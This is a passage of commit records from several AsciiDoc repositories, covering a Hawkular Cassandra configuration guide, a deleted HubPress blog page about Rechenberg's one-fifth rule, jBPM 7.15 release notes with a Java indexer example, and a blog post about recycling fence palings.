provided.\n","repos":"jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/installation.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/installation.adoc","new_contents":"= Installation Guide\nThomas Heute\n2015-09-08\n:description: Installing Hawkular\n:jbake-type: page\n:jbake-status: published\n:icons: font\n:toc: macro\n:toc-title:\n\ntoc::[]\n\n== Installing the server\nPlease follow the instruction in the link:quick-start.html[Quick Start document] for the server itself, followed by the Cassandra instructions below.\n\n== Using an external Cassandra Cluster\nBeyond basic usage and development, you will likely want to configure Hawkular\nto use an external Cassandra cluster.\n\nNOTE: Hawkular requires Cassandra 2.2.x or later. It is recommended to use the\nlatest 2.2.x release if possible.\n\nFortunately, this only requires setting\na few system properties.\n\nFrom the command line::\n\n.Using a cassandra cluster on localhost\n[source,shell]\n----\nbin\/standalone.sh -Dhawkular.backend=remote\n----\n\n.Using a cassandra cluster on different hosts\n[source,shell]\n----\nexpot CASSANDRA_NODES=\"cassandra_host1,cassandra_host2,...\"\nbin\/standalone.sh -Dhawkular.backend=remote\n----\n\nThe `CASSANDRA_NODES` environment variable should be a comma-delimited list\nof Cassandra node endpoint addresses. The value for each address should match the\nvalue of the `rpc_address` in the cassandra.yaml configuration file. You do not\nactually have to specify the address of every Cassandra node. As long as Hawkular\nis able to connect to one node, it will discover all of the other cluster nodes.\n\nFrom standalone.xml::\n[source,xml]\n----\n<system-properties>\n <property name=\"hawkular-metrics.cassandra-nodes\" value=\"node_1_address,node_2_address,node_n_address\"\/>\n <property name=\"hawkular.backend\" value=\"remote\"\/>\n<\/system-properties>\n----\n\nTIP: You can change the keyspace used by setting the `cassandra.keyspace` system property.\n\n","old_contents":"= Installation Guide\nThomas Heute\n2015-09-08\n:description: Installing Hawkular\n:jbake-type: page\n:jbake-status: published\n:icons: font\n:toc: macro\n:toc-title:\n\ntoc::[]\n\n== Installing the server\nPlease follow the instruction in the link:quick-start.html[Quick Start document] for the server itself, followed by the Cassandra instructions below.\n\n== Using an external Cassandra Cluster\nBeyond basic usage and development, you will likely want to configure Hawkular\nto use an external Cassandra cluster.\n\nNOTE: Hawkular requires Cassandra 2.2.x or later. It is recommended to use the\nlatest 2.2.x release if possible.\n\nFortunately, this only requires setting\na few system properties.\n\nFrom the command line::\n[source,shell]\n----\nbin\/standalone.sh -Dhawkular-metrics.cassandra-nodes=\"node_1_address,node_2_address,node_n_address\" -Dhawkular-metrics.backend=remote\n----\n\nThe `hawkular-metrics.cassandra-nodes` property should be a comma-delimited list\nof Cassandra node endpoint addresses. The value for each address should match the\nvalue of the `rpc_address` in the cassandra.yaml configuration file. You do not\nactually have to specify the address of every Cassandra node. As long as Hawkular\nis able to connect to one node, it will discover all of the other cluster nodes.\n\nFrom standalone.xml::\n[source,xml]\n----\n<system-properties>\n <property name=\"hawkular-metrics.cassandra-nodes\" value=\"node_1_address,node_2_address,node_n_address\"\/>\n <property name=\"hawkular-metrics.backend\" value=\"remote\"\/>\n<\/system-properties>\n----\n\nTIP: You can change the keyspace used by setting the `cassandra.keyspace` system property.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"de160335f9c041507422fccd1ef02c57f35a08e1","subject":"Deleted 2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc","message":"Deleted 2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc","new_file":"2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc","new_contents":"","old_contents":"<!DOCTYPE html>\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\">\n <meta http-equiv=\"Content-Type\" content=\"text\/html; charset=utf-8\">\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\">\n\n <title>Recenberg one-fifth success rule applied to life<\/title>\n\n <meta name=\"HandheldFriendly\" content=\"True\">\n <meta name=\"MobileOptimized\" content=\"320\">\n <meta name=\"apple-mobile-web-app-capable\" content=\"yes\">\n <meta name=\"apple-mobile-web-app-status-bar-style\" content=\"black-translucent\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, maximum-scale=1\">\n\n <meta name=\"description\" content=\"\">\n\n <meta name=\"twitter:card\" content=\"summary\">\n <meta name=\"twitter:title\" content=\"Recenberg one-fifth success rule applied to life\">\n <meta name=\"twitter:description\" content=\"\">\n\n <meta property=\"og:type\" content=\"article\">\n <meta property=\"og:title\" content=\"Recenberg one-fifth success rule applied to life\">\n <meta property=\"og:description\" content=\"\">\n\n <!-- <meta name=\"twitter:site\" content=\"\">\n\n<meta name=\"twitter:creator\" content=\"\">\n\n<meta name=\"google-site-verification\" content=\"\">\n\n<meta property=\"fb:admins\" content=\"\">\n -->\n\n <link href=\"\/favicon.ico\" rel=\"shortcut icon\" type=\"image\/x-icon\">\n <link href=\"\/apple-touch-icon-precomposed.png\" rel=\"apple-touch-icon\">\n\n <link href=\"\/\/fonts.googleapis.com\/\" rel=\"dns-prefetch\">\n <link href=\"\/\/fonts.googleapis.com\/css?family=Droid+Serif:400,700,400italic|Open+Sans:700,400&subset=latin,latin-ext\" rel=\"stylesheet\">\n\n <link rel=\"stylesheet\" href=\"\/\/raghakot.github.io\/themes\/ghostium\/assets\/css\/main.min.css?v=1483597019971\"\/>\n <link rel=\"stylesheet\" href=\"\/\/raghakot.github.io\/themes\/ghostium\/assets\/css\/custom.css?v=1483597019971\"\/>\n <link rel=\"stylesheet\" href=\"\/\/raghakot.github.io\/themes\/ghostium\/assets\/css\/asciidoctor-foundation.css?v=1483597019971\"\/>\n\n\n\n\n <script type=\"text\/javascript\">\n var ga_ua = 'UA-XXXXX-X';\n \n var disqus_shortname = 'example';\n \n var enable_pjax = true;\n\n \/\/ Pace Options\n \/\/ ==============\n window.paceOptions = {\n catchupTime: 100,\n minTime: 100,\n elements: false,\n restartOnRequestAfter: 500,\n startOnPageLoad: false\n }\n\n \/\/ Ghostium Globals\n \/\/ ==============\n window.GHOSTIUM = {};\n GHOSTIUM.haveGA = typeof ga_ua !== 'undefined' && ga_ua !== 'UA-XXXXX-X';\n GHOSTIUM.haveDisqus = typeof disqus_shortname !== 'undefined' && disqus_shortname !== 'example';\n GHOSTIUM.enablePjax = typeof enable_pjax !== 'undefined' ? enable_pjax : true;\n <\/script>\n\n <script src=\"\/\/raghakot.github.io\/themes\/ghostium\/assets\/js\/head-scripts.min.js?v=1483597019971\"><\/script>\n\n <link rel=\"canonical\" href=\"https:\/\/raghakot.github.io\/2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc\" \/>\n <meta name=\"referrer\" content=\"origin\" \/>\n \n <meta property=\"og:site_name\" content=\"Ragha's Blog\" \/>\n <meta property=\"og:type\" content=\"website\" \/>\n <meta property=\"og:title\" content=\"Recenberg one-fifth success rule applied to life\" \/>\n <meta property=\"og:description\" content=\"For those who are not familiar, Rechenberg&#8217;s 1\/5th rule refers to adaptive mutation in evolutionary strategies. It suggests that the ratio of successful mutations to all mutation should be 1\/5. It is a rough heuristic for balancing exploration vs. exploitation that worked out pretty well in\" \/>\n <meta property=\"og:url\" content=\"https:\/\/raghakot.github.io\/2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc\" \/>\n <meta property=\"article:tag\" content=\"light bulb\" \/>\n <meta property=\"article:tag\" content=\" migrated\" \/>\n \n <meta name=\"twitter:card\" content=\"summary\" \/>\n <meta name=\"twitter:title\" content=\"Recenberg one-fifth success rule applied to life\" \/>\n <meta name=\"twitter:description\" content=\"For those who are not familiar, Rechenberg&#8217;s 1\/5th rule refers to adaptive mutation in evolutionary strategies. It suggests that the ratio of successful mutations to all mutation should be 1\/5. It is a rough heuristic for balancing exploration vs. exploitation that worked out pretty well in\" \/>\n <meta name=\"twitter:url\" content=\"https:\/\/raghakot.github.io\/2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc\" \/>\n \n <script type=\"application\/ld+json\">\nnull\n <\/script>\n\n <meta name=\"generator\" content=\"HubPress\" \/>\n <link rel=\"alternate\" type=\"application\/rss+xml\" title=\"Ragha's Blog\" href=\"https:\/\/raghakot.github.io\/rss\/\" \/>\n <\/head>\n <body class=\"post-template tag-light-bulb tag-migrated\">\n\n <button data-action=\"open-drawer\" id=\"drawer-button\" class=\"drawer-button\"><i class=\"fa fa-bars\"><\/i><\/button>\n <nav tabindex=\"-1\" class=\"drawer\">\n <div class=\"drawer-container\">\n <!--.drawer-search(role=\"search\")-->\n <ul role=\"navigation\" class=\"drawer-list\">\n \n <li class=\"drawer-list-item\">\n <a href=\"https:\/\/raghakot.github.io\" data-pjax>\n <i class=\"fa fa-home\"><\/i>Home\n <\/a>\n <\/li>\n <!-- <li class=\"drawer-list-item\">\n <a href=\"https:\/\/raghakot.github.io\" title=\"Ragha's Blog\" data-pjax>\n <i class=\"fa fa-list-alt\"><\/i>All posts\n <\/a>\n <\/li> -->\n <li class=\"drawer-list-item\">\n <a href=\"https:\/\/raghakot.github.io\/rss\/\">\n <i class=\"fa fa-rss\"><\/i>Subscribe to Feed\n <\/a>\n <\/li>\n <li class=\"drawer-list-divider\"><\/li>\n <li class=\"drawer-list-item drawer-list-title\">\n Follow me\n <\/li>\n \n \n <li class=\"drawer-list-item\">\n <a href=\"https:\/\/github.com\/raghakot\" title=\"Github\" target=\"_blank\">\n <i class=\"fa fa-github\"><\/i>Github\n <\/a>\n <\/li>\n <li class=\"drawer-list-item\">\n <a href=\"https:\/\/www.linkedin.com\/in\/raghavendra-kotikalapudi-79528411\" title=\"LinkedIn\" target=\"_blank\">\n <i class=\"fa fa-linkedin\"><\/i>LinkedIn\n <\/a>\n <\/li>\n <li class=\"drawer-list-item\">\n <a href=\"mailto:ragha@outlook.com\" title=\"Email\" target=\"_blank\">\n <i class=\"fa fa-envelope-o\"><\/i>Email\n <\/a>\n <\/li>\n <\/ul>\n <\/div>\n <\/nav>\n\n <div class=\"drawer-overlay\"><\/div>\n <main id=\"container\" role=\"main\" class=\"container\">\n <div class=\"surface\">\n <div class=\"surface-container\">\n <div data-pjax-container class=\"content\">\n \n<section class=\"wrapper wrapper-post\">\n <div class=\"wrapper-container\">\n <article itemscope itemtype=\"http:\/\/schema.org\/BlogPosting\" role=\"article\" class=\"post post tag-light-bulb tag-migrated\">\n <section class=\"post-container\">\n <header class=\"post-header\">\n <ul class=\"post-meta-list\">\n <li class=\"post-meta-item\">\n <time datetime=\"2010-12-01\" itemprop=\"datePublished\">\n 6 years ago\n <\/time>\n <\/li>\n <li class=\"post-meta-item\">\n <span class=\"tags\"><i class=\"fa fa-tags\"><\/i>\n <span>\n <a href=\"https:\/\/raghakot.github.io\/tag\/light-bulb\/\">light bulb<\/a>, <a href=\"https:\/\/raghakot.github.io\/tag\/migrated\/\"> migrated<\/a><\/span>\n <\/span>\n <\/li>\n <li class=\"post-meta-item\">\n <a href=\"#disqus_thread\" data-disqus-identifier=\"\">Comments<\/a>\n <\/li>\n <\/ul>\n <h1 itemprop=\"name headline\" class=\"post-title\"><a href=\"https:\/\/raghakot.github.io\/2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc\" itemprop=\"url\" data-pjax title=\"Recenberg one-fifth success rule applied to life\">Recenberg one-fifth success rule applied to life<\/a><\/h1>\n <!--h2 itemprop=\"about\" class=\"post-subtitle\"><\/h2-->\n <\/header>\n <aside class=\"post-side\">\n <div class=\"post-author\">\n <a href=\"\" class=\"post-author-avatar\">\n <img src=\"https:\/\/avatars.githubusercontent.com\/u\/15642444?v=3\" alt=\"Raghavendra Kotikalapudi\">\n <\/a>\n <div class=\"post-author-info\">\n <a href=\"\" class=\"post-author-name\">\n Raghavendra Kotikalapudi\n <\/a>\n <p class=\"post-author-bio\"><\/p>\n <\/div>\n <\/div>\n <\/aside>\n <div itemprop=\"articleBody\" class=\"post-body\">\n <div class=\"paragraph\">\n<p>For those who are not familiar, Rechenberg’s 1\/5th rule refers to adaptive mutation in evolutionary strategies. It suggests that the ratio of successful mutations to all mutation should be 1\/5. It is a rough heuristic for balancing exploration vs. exploitation that worked out pretty well in experiments.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Perhaps we should apply this principle in life. If you are always successful (more than 1 out of 5 contiguous tries) then you are converging too fast to a local optima (aka safe options), resulting in stagnation later on. Ideally, atleast according to Rechenberg, one should try four risky avenues for every safe choice to optimally balance stagnation vs. growth.<\/p>\n<\/div>\n <\/div>\n <footer class=\"post-footer\">\n <div itemprop=\"author\" itemscope itemtype=\"http:\/\/schema.org\/Person\" class=\"post-author\">\n <a href=\"\" class=\"post-author-avatar\">\n <img itemprop=\"image\" src=\"https:\/\/avatars.githubusercontent.com\/u\/15642444?v=3\" alt=\"Raghavendra Kotikalapudi\">\n <\/a>\n <div class=\"post-author-info\">\n <h4 class=\"post-footer-heading\">Written By<\/h4>\n <a href=\"\" itemprop=\"url\" class=\"post-author-name\">\n <span itemprop=\"name\">Raghavendra Kotikalapudi<\/span>\n <\/a>\n <p itemprop=\"description\" class=\"post-author-bio\"><\/p>\n <p class=\"post-author-location\">Seattle WA<\/p>\n <p class=\"post-info\">\n <b class=\"post-info-title\">Published on<\/b>\n <time class=\"post-date\">December 01, 2010<\/time>\n <\/p>\n <\/div>\n <\/div>\n <div class=\"post-social\">\n <h4 class=\"post-footer-heading\">Spread the word<\/h4>\n <a href=\"#\" data-action=\"share-twitter\"><i class=\"fa fa-fw fa-lg fa-twitter\"><\/i><\/a>\n <a href=\"#\" data-action=\"share-facebook\"><i class=\"fa fa-fw fa-lg fa-facebook\"><\/i><\/a>\n <a href=\"#\" data-action=\"share-gplus\"><i class=\"fa fa-fw fa-lg fa-google-plus\"><\/i><\/a>\n <\/div>\n <\/footer>\n <\/section>\n <section itemprop=\"comment\" class=\"post-comments\">\n <div id=\"disqus_thread\"><\/div>\n <\/section>\n <\/article>\n\n <footer role=\"contentinfo\" class=\"footer\">\n <p><small>Copyright © <span itemprop=\"copyrightHolder\">Ragha's Blog<\/span>. 2017. All Rights Reserved.<\/small><\/p>\n <p><small><a href=\"http:\/\/ghostium.oswaldoacauan.com\/\" target=\"_blank\">Ghostium Theme<\/a> by <a href=\"http:\/\/twitter.com\/oswaldoacauan\" target=\"_blank\">@oswaldoacauan<\/a><\/small><\/p>\n <p><small>Adapted by <a href=\"https:\/\/twitter.com\/mgreau\">Maxime Gr\u00e9au<\/a><\/small><\/p>\n <p><small>Published with <a href=\"http:\/\/hubpress.io\">HubPress<\/a><\/small><\/p>\n <\/footer>\n <\/div>\n<\/section>\n\n\n<section class=\"post-comments\">\n <div id=\"disqus_thread\"><\/div>\n <script type=\"text\/javascript\">\n var disqus_shortname = 'raghakot-github-io'; \/\/ required: replace example with your forum shortname\n \/* * * DON'T EDIT BELOW THIS LINE * * *\/\n (function() {\n var dsq = document.createElement('script'); dsq.type = 'text\/javascript'; dsq.async = true;\n dsq.src = '\/\/' + disqus_shortname + '.disqus.com\/embed.js';\n (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);\n })();\n <\/script>\n <noscript>Please enable JavaScript to view the <a href=\"http:\/\/disqus.com\/?ref_noscript\">comments powered by Disqus.<\/a><\/noscript>\n <a href=\"http:\/\/disqus.com\" class=\"dsq-brlink\">comments powered by <span class=\"logo-disqus\">Disqus<\/span><\/a>\n<\/section>\n\n\n <\/div>\n <\/div>\n <\/div>\n <\/main>\n\n <script src='https:\/\/cdn.mathjax.org\/mathjax\/latest\/MathJax.js?config=TeX-AMS-MML_HTMLorMML'><\/script> <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/jquery\/2.1.3\/jquery.min.js?v=\"><\/script> <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/moment.js\/2.9.0\/moment-with-locales.min.js?v=\"><\/script> <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/8.4\/highlight.min.js?v=\"><\/script> \n <script type=\"text\/javascript\">\n jQuery( document ).ready(function() {\n \/\/ change date with ago\n jQuery('ago.ago').each(function(){\n var element = jQuery(this).parent();\n element.html( moment(element.text()).fromNow());\n });\n });\n\n hljs.initHighlightingOnLoad();\n <\/script>\n\n <script src=\"\/\/raghakot.github.io\/themes\/ghostium\/assets\/js\/foot-scripts.min.js?v=1483597019971\"><\/script>\n\n <script>\n (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){\n (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),\n m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\n })(window,document,'script','\/\/www.google-analytics.com\/analytics.js','ga');\n\n ga('create', 'UA-78195880-1', 'auto');\n ga('send', 'pageview');\n\n <\/script>\n\n <\/body>\n<\/html>\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"9714423a183e97fe30f5534d3f3a491222694097","subject":"jBPM N&N for 7.15 release (#1215)","message":"jBPM N&N for 7.15 release (#1215)\n\n","repos":"michelehaglund\/kie-docs,jomarko\/kie-docs,michelehaglund\/kie-docs,manstis\/kie-docs,manstis\/kie-docs,jomarko\/kie-docs","old_file":"doc-content\/jbpm-docs\/src\/main\/asciidoc\/ReleaseNotes\/Release.7.15.0.Final-section.adoc","new_file":"doc-content\/jbpm-docs\/src\/main\/asciidoc\/ReleaseNotes\/Release.7.15.0.Final-section.adoc","new_contents":"[[_jbpmreleasenotes7150]]\n\n= New and Noteworthy in jBPM 7.15.0\n\nThe following features were added to jBPM 7.15\n\n\n== Manage section error messages handling\n\nThis release includes improvements to error scenarios when using any of the manage section operations, providing more detailed\ninformation about exceptions when communicating with a remote server.\nA more specific alert panel for when no Kie Server instance is connected or is missing the required `Process`\ncapability is also included to better inform users.\n\nimage:ReleaseNotes\/ConsoleErrorBlockingUI.png[align=\"center\", title=\"Alert panel\"]\n\n\n== New timeline view for Task Logs\n\nIn this release, Task Logs view was redesigned, allowing users to easily visualize the events related\nto a specific task based on a timeline of events.\nEvents are highlighted in blue to indicate a transition in the Task lifecycle for events like 'Claim' and 'Start' and\nhave a grey out highlight to indicate the completion of the task or a user releasing it.\n\nBy default, the latest 10 events are presented in the timeline but users can load more data all the way back to the\nthe task creation.\n\n\nimage:ReleaseNotes\/task-logs_7.15.0.png[align=\"center\", title=\"Task Logs timeline\"]\n\n== KIE Server forms HTML elements support for variables\n\nRecently added KIE Server Form Rendering has been enhanced to extract variables in HTML elements of the form.\nWhen designing forms and using HTML elements users can refer to process\/task variables to be extracted on rendering time.\n\n[source, html]\n----\n<h3>Hello ${user.name}!<\/h3>\n----\n\nAbove expression (`${user.name}`) will be extracted at rendering time assuming there is user (task or process) variable available.\n\n== Camel component for jBPM has been significantly improved.\n\nApache Camel comes with huge set of components to integrate with various systems. There has been\n*camel-jbpm* for quite some time (since 2.6 version of Camel) but it was based on v6 `kie-remote-client`\nand supported only producer.\n\nWith Camel version 2.23.0 *camel-jbpm* component has be significantly improved and upgraded. It now supports the latest\nversion of jBPM and for producer it relies on `kie-server-client` instead `kie-remote-client`.\nIn addition to that consumer support has been added which allows to use camel routes that will be initiated by:\n\n* process event listeners\n* task life cycle event listeners\n* case event listeners\n\nOn top of that there is also camel based event emitter that allows to send events through event emitter infrastructure using camel routes.\n\nSee http:\/\/mswiderski.blogspot.com\/2018\/11\/jbpm-empowered-by-camel-to-integrate.html[following article] for more details and a sample project.\n\n== Audit log mode applies to task and case audit logs\n\nWell known audit mode setting from deployment descriptor now supports all three types of audit logs\n\n* process (has been supported from the beginning)\n* task\n* case\n\nAudit modes that are supported are:\n\n* JPA (default)\n* JMS\n* None\n\nNOTE: None does not apply to case audit data as these are mandatory to be stored (either directly or via JMS).\n\n== Variable indexer supported for case file data\n\nProcess and task variables allow to use custom VariableIndexer to store the information in log tables.\n7.15 comes with support for using VariableIndexer for case file data. An example of case variable\nindexer can be found below\n\n[source, java]\n----\npublic class PatientCaseVariableIndexer implements CaseVariableIndexer {\n\n @Override\n public boolean accept(Object variable) {\n return Patient.class.isAssignableFrom(variable.getClass());\n }\n\n @Override\n public List<CaseFileData> index(String name, Object variable) {\n List<CaseFileData> indexed = new ArrayList<CaseFileData>();\n\n CaseFileDataLog caseVariable = new CaseFileDataLog();\n caseVariable.setItemName(name);\n caseVariable.setItemValue(variable == null ? \"\" : variable.toString());\n caseVariable.setItemType(variable.getClass().getName());\n\n indexed.add(caseVariable);\n\n \/\/ add mapped information as another entry\n CaseFileDataLog caseVariableMapped = new CaseFileDataLog();\n caseVariableMapped.setItemName(name + \"_name\");\n caseVariableMapped.setItemValue(((Patient) variable).getName());\n caseVariableMapped.setItemType(String.class.getName());\n\n indexed.add(caseVariableMapped);\n\n return indexed;\n }\n}\n----\n\nIn the above mentioned example single Patient case variable will be stored in data log table\nas two entires (rows) to allow more fine grained searching capabilities.\n","old_contents":"[[_jbpmreleasenotes7150]]\n\n= New and Noteworthy in jBPM 7.15.0\n\nThe following features were added to jBPM 7.15\n\n\n== Manage section error messages handling\n\nThis release includes improvements to error scenarios when using any of the manage section operations, providing more detailed\ninformation about exceptions when communicating with a remote server.\nA more specific alert panel for when no Kie Server instance is connected or is missing the required `Process`\ncapability is also included to better inform users.\n\nimage:ReleaseNotes\/ConsoleErrorBlockingUI.png[align=\"center\", title=\"Alert panel\"]\n\n\n== New timeline view for Task Logs\n\nIn this release, Task Logs view was redesigned, allowing users to easily visualize the events related\nto a specific task based on a timeline of events.\nEvents are highlighted in blue to indicate a transition in the Task lifecycle for events like 'Claim' and 'Start' and\nhave a grey out highlight to indicate the completion of the task or a user releasing it.\n\nBy default, the latest 10 events are presented in the timeline but users can load more data all the way back to the\nthe task creation.\n\n\nimage:ReleaseNotes\/task-logs_7.15.0.png[align=\"center\", title=\"Task Logs timeline\"]","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c3aed04d9dcc18092dfa3684dd775bfe1472b459","subject":"Update 2015-02-15-Recycling-Fence-Palings-for-Tree-Borders.adoc","message":"Update 2015-02-15-Recycling-Fence-Palings-for-Tree-Borders.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2015-02-15-Recycling-Fence-Palings-for-Tree-Borders.adoc","new_file":"_posts\/2015-02-15-Recycling-Fence-Palings-for-Tree-Borders.adoc","new_contents":"= Recycling Fence Palings for Tree Borders\n:hp-tags: reclaim, reuse, recycle, garden borders\n:hp-image: covers\/ideas.jpg\n:published_at: 2015-02-15\n \nI had some old treated pine fence palings left over from when I replaced all the side gate palings. My wife suggested I use them to fix up the borders around the trees, so I took her advice and got it done over two weekends. \n\nimage::Tree_Border_Two.jpg[title=\"The Finished Product\", width=\"300, height=\"500\"]\n\n== Would You Use Wood That Would Cost You Nix?\n\n*I would*. Seriously, if you can get wood cheap or free, you take it and save some big cash. I could have gone and purchased some new wood from the hardware store, but that would have almost doubled the cost of the job. \n\nThe most time consuming part of the job was dressing off the old pine planks, and painting them. They were pretty rough and a mouse sander quickly took care of that. \n\nNOTE: If you don't have a bunch of palings lying around like I did, you might want to go to your local reclamation yard. There might be some good quality timber you can use there.\n\n== Wood That Wasn't Free\n\nI did actually fork our for some new timber. The spacers required for the job were cut at the cutting station at Bunnings. \n\nimage::http:\/\/jaredmorgs.github.io\/images\/Tree_Border_Palings_Spacers.jpg[title=\"Spacers\", width=\"300, height=\"500\"]\n\nI have to say I could have probably done a better job myself regarding size consistency, but at 12 blocks to be cut, paying 50c a cut was worth it. And the size still worked OK, so not a problem.\n\n== Free Paint is Free, Except When You Run Out of Undercoat\n\nimage::http:\/\/jaredmorgs.github.io\/images\/Tree_Border_Palings_Painted.jpg[title=\"Painted Slats\", width=\"300, height=\"500\"]\n\nThe paint colour was a water-based interior colour, courtesy of Masters North Lakes, after they gave us a whole stack of mistint tins as part of a Sausage Sizzle Fundraiser we conducted. Our childs' Kindergarten couldn't accept them due to the paint not being non-toxic, so we saved this colour specifically for this job, and gave the other tin to them for minor touch-ups around the Kindy. \n\n\nBecasue this wasn't a standard fence paint, I needed to undercoat before painting with two top coats. This quite literally took all weekend last weekend. I _nearly_ had enough undercoat to get the job done, but I had to fork out about $25 for a new tin. Undercoat is a good thing to have around anyhow, so I wan't too worried.\n\n== Measure Twice, Then Check The Fit, Then Cut\n\nEven though I measured once, measured twice, I still had some issues with measurements. A quick cut here and there fixed that. I got it mostly right. I had assembly knocked over this morning. The key with this type of thing is to paint the planks first before assembly. Then only cut one end of the plank if you need to make adjustments. This way you don't need to repaint the raw edge becasue it is abutted against a painted side. \n\n== All In All, Not A Bad Job\n\nAll in all, they've come up really nicely. All up, I spent about $100 including some tools I needed for the job. Most of the expense was for the plank of plywood I used to convert my glass-top office desk to a workbench. That paid dividends these two weekends for sure.\n\nimage::Tree_Border_Two.jpg[title=\"Being Frugal Pays\", width=\"300, height=\"500\"]","old_contents":"= Recycling Fence Palings for Tree Borders\n:hp-tags: reclaim, reuse, recycle, garden borders\n:hp-cover: covers\/ideas.jpg\n:published_at: 2015-02-15\n \nI had some old treated pine fence palings left over from when I replaced all the side gate palings. My wife suggested I use them to fix up the borders around the trees, so I took her advice and got it done over two weekends. \n\nimage::Tree_Border_Two.jpg[title=\"The Finished Product\", width=\"300, height=\"500\"]\n\n== Would You Use Wood That Would Cost You Nix?\n\n*I would*. Seriously, if you can get wood cheap or free, you take it and save some big cash. I could have gone and purchased some new wood from the hardware store, but that would have almost doubled the cost of the job. \n\nThe most time consuming part of the job was dressing off the old pine planks, and painting them. They were pretty rough and a mouse sander quickly took care of that. \n\nNOTE: If you don't have a bunch of palings lying around like I did, you might want to go to your local reclamation yard. There might be some good quality timber you can use there.\n\n== Wood That Wasn't Free\n\nI did actually fork our for some new timber. The spacers required for the job were cut at the cutting station at Bunnings. \n\nimage::http:\/\/jaredmorgs.github.io\/images\/Tree_Border_Palings_Spacers.jpg[title=\"Spacers\", width=\"300, height=\"500\"]\n\nI have to say I could have probably done a better job myself regarding size consistency, but at 12 blocks to be cut, paying 50c a cut was worth it. And the size still worked OK, so not a problem.\n\n== Free Paint is Free, Except When You Run Out of Undercoat\n\nimage::http:\/\/jaredmorgs.github.io\/images\/Tree_Border_Palings_Painted.jpg[title=\"Painted Slats\", width=\"300, height=\"500\"]\n\nThe paint colour was a water-based interior colour, courtesy of Masters North Lakes, after they gave us a whole stack of mistint tins as part of a Sausage Sizzle Fundraiser we conducted. Our childs' Kindergarten couldn't accept them due to the paint not being non-toxic, so we saved this colour specifically for this job, and gave the other tin to them for minor touch-ups around the Kindy. \n\n\nBecasue this wasn't a standard fence paint, I needed to undercoat before painting with two top coats. This quite literally took all weekend last weekend. I _nearly_ had enough undercoat to get the job done, but I had to fork out about $25 for a new tin. Undercoat is a good thing to have around anyhow, so I wan't too worried.\n\n== Measure Twice, Then Check The Fit, Then Cut\n\nEven though I measured once, measured twice, I still had some issues with measurements. A quick cut here and there fixed that. I got it mostly right. I had assembly knocked over this morning. The key with this type of thing is to paint the planks first before assembly. Then only cut one end of the plank if you need to make adjustments. This way you don't need to repaint the raw edge becasue it is abutted against a painted side. \n\n== All In All, Not A Bad Job\n\nAll in all, they've come up really nicely. All up, I spent about $100 including some tools I needed for the job. Most of the expense was for the plank of plywood I used to convert my glass-top office desk to a workbench. That paid dividends these two weekends for sure.\n\nimage::Tree_Border_Two.jpg[title=\"Being Frugal Pays\", width=\"300, height=\"500\"]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"cf07a79ad1a61b50a62de27b3a632b6567186c95","subject":"Regen docs","message":"Regen 